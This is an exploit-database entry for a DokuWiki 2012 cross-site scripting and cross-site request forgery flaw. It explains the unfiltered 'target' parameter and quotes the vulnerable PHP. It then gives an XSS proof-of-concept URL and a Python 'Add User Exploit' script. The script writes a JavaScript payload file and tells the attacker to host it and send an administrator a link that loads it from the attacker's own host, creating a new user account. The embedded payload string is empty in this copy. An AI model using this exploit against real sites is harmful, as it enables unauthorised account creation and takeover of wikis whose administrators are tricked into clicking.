Description
Exploit for php platform in category web applications
{"id": "1337DAY-ID-18070", "type": "zdt", "bulletinFamily": "exploit", "title": "DocuWiki 2012/01/25 CSRF / XSS", "description": "Exploit for php platform in category web applications", "published": "2012-04-18T00:00:00", "modified": "2012-04-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18070", "reporter": "IRCRASH", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T11:47:24", "viewCount": 10, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "canvas", "idList": ["NGINX"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/18070", "sourceData": "######################################################################################\r\nDokuWiki Ver.2012/01/25 ( Latest Version ) CSRF Add User Exploit\r\n######################################################################################\r\nDiscovered by : Khashayar Fereidani\r\nTeam Website : HTTP://IRCRASH.COM ( IRCRASH Security Community )\r\nFacebook : http://facebook.com/fereidani\r\nTwitter : https://twitter.com/#!/IRCRASH\r\nFacebook Page : http://www.facebook.com/pages/IRCRASH/127804297326163\r\nSoftware Developer : http://www.dokuwiki.org/\r\n######################################################################################\r\nTest System Details\r\nOS : Linux\r\nWebServer : Nginx + PHP-5.3.5\r\nWebBrowser : Firefox 10\r\n######################################################################################\r\nSubjects :\r\n1. Vulnerability Explanation\r\n2. Code Review\r\n3. Cross Site Scripting vulnerability Proof of concept\r\n4. Add User Exploit\r\n######################################################################################\r\n1. 
Vulnerability Explanation :\r\n\r\nVariable target in file /inc/html.php will not be checked for illegal input and\r\n function html_edit_form print $param['target'] from $param array without any filter.\r\nThis variable(target) is exploitable for Cross Site Scripting vulnerability .\r\n\r\n######################################################################################\r\n2. Code Review :\r\n\r\n# Filename : /inc/html.php\r\n** Line 1336 ( Vulnerable Variable $_REQUEST['target'] ) :\r\n$data = array('form' => $form,\r\n 'wr' => $wr,\r\n 'media_manager' => true,\r\n 'target' => (isset($_REQUEST['target']) && $wr &&\r\n $RANGE !== '') ? $_REQUEST['target'] : 'section',\r\n 'intro_locale' => $include);\r\n\r\n** Line 1436 (Vulnerable Function) :\r\nfunction html_edit_form($param) {\r\n global $TEXT;\r\n\r\n if ($param['target'] !== 'section') {\r\n msg('No editor for edit target ' . $param['target'] . ' found.', -1);\r\n }\r\n\r\n $attr = array('tabindex'=>'1');\r\n if (!$param['wr']) $attr['readonly'] = 'readonly';\r\n\r\n $param['form']->addElement(form_makeWikiText($TEXT, $attr));\r\n}\r\n######################################################################################\r\n3. Cross Site Scripting vulnerability Proof of concept :\r\nVulnerable URL : http://WEBSITE/doku.php?do=edit&id=S9F8W2A&target=[XSS]\r\nSample : http://sitename/doku.php?do=edit&id=S9F8W2A&target=<script>alert(123)</script>\r\n######################################################################################\r\n4. 
Add User Exploit :\r\n#EXPLOITSTART\r\n#!/usr/bin/python\r\nimport base64,string,random\r\ndef randstr(size=8, chars=string.ascii_uppercase + string.digits):\r\n return ''.join(random.choice(chars) for x in range(size))\r\nprint \"\"\"\r\n#####################################\r\n# IRCRASH Dokuwiki Add User Exploit #\r\n# Exploited By Khashayar Fereidani #\r\n# Http://ircrash.com #\r\n#####################################\r\n\"\"\"\r\nshellcode=\"\"\"\r\n\"\"\"\r\nshellcode=base64.b64decode(shellcode)\r\nusername=raw_input(\"[*] Enter New Username :\")\r\npassword=raw_input(\"[*] Enter Password :\")\r\nshellcode=shellcode.replace(\"USERNAME\",username).replace(\"PASSWORD\",password)\r\nlocalFile = open('my.js', 'w')\r\nlocalFile.write(shellcode)\r\nlocalFile.close()\r\nprint \"\"\"[*] A new file (my.js) added to your local folder .\r\n Upload it on your own host and send it for doku admin like this :\r\n http://WEBSITE/PATH/doku.php?do=edit&id=\"\"\" + randstr() + \"&target=<script SRC=http://YOUROWNHOST/YOURFOLDER/my.js></script>\"\r\n#EXPLOITEND\r\n######################################################################################\r\n Tnx : Just God\r\n######################################################################################\r\n\r\n\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647589307, "score": 1659703426, "epss": 1678811959}}